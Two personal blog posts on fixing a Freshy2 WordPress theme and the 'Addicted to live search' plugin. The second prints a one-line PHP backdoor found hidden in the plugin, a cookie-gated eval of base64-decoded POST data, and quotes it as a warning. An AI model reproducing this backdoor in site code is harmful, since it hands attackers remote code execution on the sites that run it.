Tag Archives: Addicted to live search plugin

New theme part III

After last nights debacle with the live search plugin, I tried an other one that was based on it: Live search popup. Unfortunately that one didn’t display very well in my theme, so I just removed it and won’t be offering a “Web 2.0″ search option for now.

Further changes to the Freshy2 theme and wordpress:

  • I’ve added a none.gif to the background images folder, since I got loads of 404 messages about it not being in there.
  • I’ve copied the default search box style (#s) from the wordpress theme and removed the “white” background color so you can see what you type when searching. Unfortunately I now need a black anti-aliased version of the search icon.
  • I’ve added a header to the search widget (guess that will be gone on the next WP update from Debian, as soon as the TinyMCE maintainer updates TinyMCE). Not sure if I really want it to stay, but if I do I need to find a better way to add it.

Now I “just” need to work on the <pre> and <code> output of the theme, since reading it is not very easy at the moment.

And I found why the Live search plugin didn’t work. It uses the deprecated get_bloginfo(‘siteurl’), while it should be using get_bloginfo(‘wpurl’). But well, after having contact with the maintainer of it, I won’t be using it. He is not interested in maintaining it, so better not to use that one.

New theme continued: why not to trust plugins

With this new theme I also saw that it was compatible with the “Addicted to live search plugin”[1]. (Un)fortunately this plugin doesn’t work out of the box either, at least not if you do not have WordPress running directly in the root.

But… Since I was looking at the code to fix this I also found:

<?php if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; } ?>

No thank you very much!

So what did we learn: Never ever trust WordPress plugins… So do not use this (version of the) plugin, unless you know how to remove this piece of code!

I’ll check out after some sleep what WordPress has to offer when you find a vulnerability like this in a plugin, so perhaps users of it can be warned… And I’ll fix this plugin later also, to be continued…

Update: it seems that it’s fixed. Although I’m not sure how the WordPress auto-update feature could create a line of code like that (as in, this sounds like bollocks to me).


[1] Funny sidenote, I found this blog two years ago and commented on one of his articles on Oracle.